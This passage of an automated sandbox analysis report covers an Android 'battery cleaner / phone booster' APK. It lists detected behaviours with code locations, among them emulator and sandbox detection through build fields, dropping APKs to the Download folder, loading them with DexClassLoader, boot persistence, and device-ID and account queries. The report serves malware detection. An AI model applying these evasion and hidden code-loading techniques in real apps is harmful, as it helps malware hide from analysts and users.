Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncActivity:63API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder$FloatPropertyValuesHolder;->setAnimatedValue:32API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder$IntPropertyValuesHolder;->setAnimatedValue:32API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder;->setupValue:119API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder;->setAnimatedValue:156API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder;->setupSetterAndGetter:223API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.util.client.zza;->zzW:44API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.util.client.zza;->zzW:48API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.dynamic.zze;->zzp:9API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.common.internal.DowngradeableSafeParcel;->zza:6API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzal;->zza:50API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzal;->zzf:106API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh$1;->invoke:14API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh$1;->invoke:19API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:15API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:20API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:23API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:33API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:36API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:52API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:62API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:67API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:75API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:81API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:84API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:117API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:127API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:134API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:142API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:8API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:16API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:24API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:31API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzsv;->zza:20API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzsv;->zza:40API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzsv;->zza:48API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.measurement.internal.zzab;->zzh:187API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzN:9API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzb:22API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzb:37API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzh:50API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzi:65API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzd;->zzfX:130API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.server.response.FastJsonResponse;->zzb:101API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:17API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.util.ReflectiveProperty;->get:85API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.util.ReflectiveProperty;->get:91API Call: java.lang.reflect.Field.get
Source: com.nineoldandroids.util.ReflectiveProperty;->set:98API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

Drops a new APK file
Source: Android AppFile dump: /storage/emulated/0/Download/0.apk
Source: Android AppFile dump: /storage/emulated/0/Download/2.apk
Source: Android AppFile dump: /storage/emulated/0/Download/flashset.apk

Boot Survival:

Has permission to execute code after phone reboot
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activated when the phone screen turns on)
Source: com.google.android.gms.internal.zzrp;-><init>:18API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

Has permission to query the list of currently running applications
Source: submitted apkRequest permission: android.permission.GET_TASKS
Has permission to terminate background processes of other applications
Source: submitted apkRequest permission: android.permission.KILL_BACKGROUND_PROCESSES
Queries list of running processes/tasks
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityBatteySaver;->clearApplicationData:25API Call: android.app.ActivityManager.getRunningAppProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityPhoneBooster;->clearApplicationData:25API Call: android.app.ActivityManager.getRunningAppProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityScanAll;->clearBatteySaver:24API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.gcm.zzb;->zzaI:120API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zzbf;->zzcH:108API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zzdm$zzb;->zza:41API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zzir;->zzN:115API Call: android.app.ActivityManager.getRunningTasks
Source: com.google.android.gms.internal.zzir;->zzO:125API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zznf;->zzi:18API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.tagmanager.zzdb$zza;->zzcH:51API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.ads.zxxz.a;->a:5API Call: android.app.ActivityManager.getRunningAppProcesses
Uses Crypto APIs
Source: com.google.android.gms.measurement.internal.zzaj;->zzbv:256API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.measurement.internal.zzn;->zziJ:132API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:82API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:84API Call: java.security.MessageDigest.update
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:87API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzir;->zzhs:447API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzir;->zzhs:448API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzir;->zzhs:449API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzih;-><init>:7API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzih;-><init>:7API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.ads.zxxz.g;->b:64API Call: java.security.MessageDigest.getInstance
Source: com.google.android.ads.zxxz.g;->b:67API Call: java.security.MessageDigest.update
Source: com.google.android.ads.zxxz.g;->b:67API Call: java.security.MessageDigest.update
Source: com.google.android.ads.zxxz.g;->b:70API Call: java.security.MessageDigest.digest
Source: com.google.android.ads.zxxz.k;->a:7API Call: java.security.MessageDigest.getInstance
Source: com.google.android.ads.zxxz.k;->a:10API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzak;->zza:28API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzak;->zza:29API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzak;->zza:30API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.iid.InstanceID;->zza:24API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.iid.InstanceID;->zza:25API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.analytics.internal.zza;->zzbb:50API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.analytics.internal.zzam;->zzbv:123API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:17API Call: javax.crypto.Cipher.init
Source: com.google.android.gms.internal.zzbg;->zzcL:7API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzbj;->zzu:13API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzbj;->zzu:15API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzir;->zzhs:450API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzaj;->zzr:427API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzt;->zzfi:128API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.tagmanager.zzap;->zzg:12API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.tagmanager.zzap;->zzg:13API Call: java.security.MessageDigest.update
Source: com.google.android.gms.tagmanager.zzap;->zzg:14API Call: java.security.MessageDigest.digest
Source: com.google.android.ads.zxxz.f;->a:15API Call: java.security.MessageDigest.getInstance
Source: com.google.android.ads.zxxz.f;->a:18API Call: java.security.MessageDigest.update
Source: com.google.android.ads.zxxz.f;->a:21API Call: java.security.MessageDigest.digest

Malware Analysis System Evasion:

Tries to detect Android x86
Source: Leptdz/jhxonwlp/zdmg/Tools;->checkSandBox(Landroid/content/Context;)ZMethod string: "Android SDK built for x86"
Tries to detect the analysis device (e.g. the Android emulator)
Source: Leptdz/jhxonwlp/zdmg/Tools;->checkSandBox(Landroid/content/Context;)ZMethod string: "Emulator"
Accesses Android OS build fields
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:153Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:156Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:159Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:162Field Access: android.os.Build.FINGERPRINT
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:165Field Access: android.os.Build.FINGERPRINT
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:168Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:171Field Access: android.os.Build.MANUFACTURER
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:174Field Access: android.os.Build.BRAND
Source: com.google.android.gms.internal.zzbu;-><init>:27Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.internal.zzhj$zza;-><init>:13Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.ads.internal.util.client.zza;->zzT:24Field Access: android.os.Build.DEVICE
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:177Field Access: android.os.Build.DEVICE
Source: com.nineoldandroids.view.animation.AnimatorProxy;-><clinit>:1Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.ads.internal.util.client.zza;->zzhI:111Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.common.zze;->zzoN:239Field Access: android.os.Build.TYPE
Source: com.google.android.gms.fitness.data.Device;->getLocalDevice:13Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.fitness.data.Device;->getLocalDevice:14Field Access: android.os.Build.MODEL
Source: com.google.android.gms.fitness.data.Device;->getLocalDevice:15Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.analytics.internal.zzah;-><init>:6Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.analytics.internal.zzah;-><init>:9Field Access: android.os.Build.MODEL
Source: com.google.android.gms.analytics.internal.zzah;-><init>:10Field Access: android.os.Build.ID
Source: com.google.android.gms.analytics.internal.zzx;->version:1Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.analytics.internal.zzx;->version:4Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.internal.zzbu;-><init>:18Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzbu;-><init>:22Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.internal.zzha;->zza:68Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzhe;->zza:211Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.internal.zzhe;->zza:214Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzhj$zza;->zzD:45Field Access: android.os.Build.FINGERPRINT
Source: com.google.android.gms.internal.zzir;->zza:216Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzir;->zzhr:415Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzir;->zzhr:418Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzir;->zzhr:424Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.internal.zzir;->zzhr:427Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.internal.zzir;->zzhr:429Field Access: android.os.Build.DISPLAY
Source: com.google.android.gms.internal.zzir;->zzhr:432Field Access: android.os.Build.DISPLAY
Source: com.google.android.gms.internal.zzir;->zzht:454Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.internal.zzir;->zzht:455Field Access: android.os.Build.MODEL
Source: com.google.android.gms.measurement.internal.zzg;->zzCy:20Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.measurement.internal.zzg;->zzht:23Field Access: android.os.Build.MODEL
Source: com.google.android.gms.tagmanager.zzab;->zzP:5Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.tagmanager.zzab;->zzP:6Field Access: android.os.Build.MODEL
Source: com.google.android.gms.tagmanager.zzal;->version:1Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.tagmanager.zzal;->version:6Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.tagmanager.zzbx;->zzP:5Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.tagmanager.zzcx;-><init>:7Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.tagmanager.zzcx;-><init>:10Field Access: android.os.Build.MODEL
Source: com.google.android.gms.tagmanager.zzcx;-><init>:11Field Access: android.os.Build.ID
Source: com.nineoldandroids.view.ViewPropertyAnimator;->animate:5Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.ads.zxxz.f;->a:26Field Access: android.os.Build.BOARD
Source: com.google.android.ads.zxxz.f;->a:29Field Access: android.os.Build.DEVICE
Source: com.google.android.ads.zxxz.f;->a:32Field Access: android.os.Build.BRAND
Source: com.google.android.ads.zxxz.i;->a:2Field Access: android.os.Build$VERSION.RELEASE
Queries several pieces of sensitive phone information
Source: Lcom/google/android/gms/internal/zzir;->zza(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Landroid/os/Bundle;Z)VMethod string: "os"
Source: Lcom/google/android/gms/tagmanager/zzbz;-><clinit>()VMethod string: "android"
Source: Lcom/google/android/gms/games/request/GameRequestRef;->getType()IMethod string: "type"
Source: Lcom/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchRef;->getVersion()IMethod string: "version"
Source: Lcom/google/android/gms/internal/zznv;->zzaH(Landroid/content/Context;)ZMethod string: "phone"
Source: Lcom/google/android/gms/internal/zzpq;->toString()Ljava/lang/String;Method string: "appid"
Source: Lcom/google/android/gms/internal/zzbu;-><init>(Landroid/content/Context;Ljava/lang/String;)VMethod string: "sdk"
Source: Lcom/google/android/gms/fitness/data/Bucket;->zzeM(I)Ljava/lang/String;Method string: "time"
Source: Lcom/google/android/gms/internal/zzpy;->toString()Ljava/lang/String;Method string: "category"
Source: Lcom/google/android/gms/tagmanager/zzdg;->zzaa(Ljava/util/Map;)Lcom/google/android/gms/analytics/ecommerce/Product;Method string: "brand"
Queries the unique operating system id (ANDROID_ID)
Source: com.google.android.gms.ads.internal.util.client.zza;->zzT:28API Call: android.provider.Settings.Secure.getString
Source: com.google.android.gms.fitness.data.Device;->zzaC:31API Call: android.provider.Settings$Secure.getString
Source: com.google.android.gms.tagmanager.zzaa;->zzaY:11API Call: android.provider.Settings$Secure.getString
Source: com.google.android.gms.tagmanager.zzbk;->zzaY:11API Call: android.provider.Settings$Secure.getString
Source: com.google.android.ads.zxxz.f;->a:5API Call: android.provider.Settings$Secure.getString
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: GOOGPLAY.SFBinary or memory string: SHA1-Digest: EEVvEieW6W9PPCuIqEmUHiPHXg8=

Anti Debugging:

Creates a new dex file (likely to load new code)
Source: com.google.android.gms.internal.zzal;->zzm:254API Call: java.io.File.<init>

HIPS / PFW / Operating System Protection Evasion:

Uses the DexClassLoader (often used for code injection)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:90API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/flashset.apk")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:27API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/flashset.apk")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:121API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/2.apk")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:121API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/0.apk")
Source: com.google.android.gms.internal.zzal;->zzm:170API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/ghl.phoneboost.com/cache/ads780543288.jar")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:29API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncActivity:58API Call: dalvik.system.DexClassLoader.<init> (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncActivity:60API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:92API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:123API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:173API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:176API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:179API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:182API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:185API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:188API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:191API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:194API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:197API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:200API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:203API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:206API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:209API Call: dalvik.system.DexClassLoader.loadClass (not executed)

Language, Device and Operating System Detection:

Queries the SIM provider name (SPN - Service Provider Name)
Source: unknown API Call: android.telephony.TelephonyManager.getSimOperatorName returned ""
Queries the network operator ISO country code
Source: unknown API Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Queries the network operator numeric MCC+MNC (mobile country code + mobile network code)
Source: com.google.android.gms.internal.zzhj$zza;->zza:66 API Call: android.telephony.TelephonyManager.getNetworkOperator returned "26203"
Queries the unique device ID (IMEI, MEID or ESN)
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:150 API Call: android.telephony.TelephonyManager.getDeviceId

Stealing of Sensitive Information:

Queries a list of installed applications
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityFileManeger$LoadApplications;->doInBackground:10 API Call: android.content.pm.PackageManager.getInstalledApplications
Queries camera information
Source: com.google.android.gms.vision.CameraSource;->zzIb:8 API Call: android.hardware.Camera.open
Source: com.google.android.gms.vision.CameraSource;->zza:97 API Call: android.hardware.Camera.getCameraInfo
Source: com.google.android.gms.vision.CameraSource;->zzkp:124 API Call: android.hardware.Camera.getNumberOfCameras
Source: com.google.android.gms.vision.CameraSource;->zzkp:125 API Call: android.hardware.Camera.getCameraInfo
Queries stored mail and application accounts (e.g. Gmail or WhatsApp)
Source: com.google.android.gms.appinvite.AppInviteInvitation$IntentBuilder;->setAccount:40 API Call: android.accounts.Account.type
Source: com.google.android.gms.auth.api.credentials.IdentityProviders;->getIdentityProviderForAccount:5 API Call: android.accounts.Account.type
Source: com.google.android.gms.auth.api.credentials.IdentityProviders;->getIdentityProviderForAccount:9 API Call: android.accounts.Account.type
Source: com.google.android.gms.common.internal.zzf;->getAccountName:20 API Call: android.accounts.Account.name
Source: com.google.android.gms.location.places.internal.zze;-><init>:5 API Call: android.accounts.Account.name
Source: com.google.android.gms.location.places.internal.zzk;-><init>:5 API Call: android.accounts.Account.name
Source: com.google.android.gms.signin.internal.zzh;->zzFN:8 API Call: android.accounts.Account.name
Source: com.google.android.gms.plus.Plus$1;->zza:5 API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInOptions;->zzmJ:63 API Call: android.accounts.Account.name

Remote Access Functionality:

Uses DownloadManager to fetch additional components
Source: com.google.android.gms.internal.zzfp$1;->onClick:10 API Call: android.app.DownloadManager.enqueue

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches
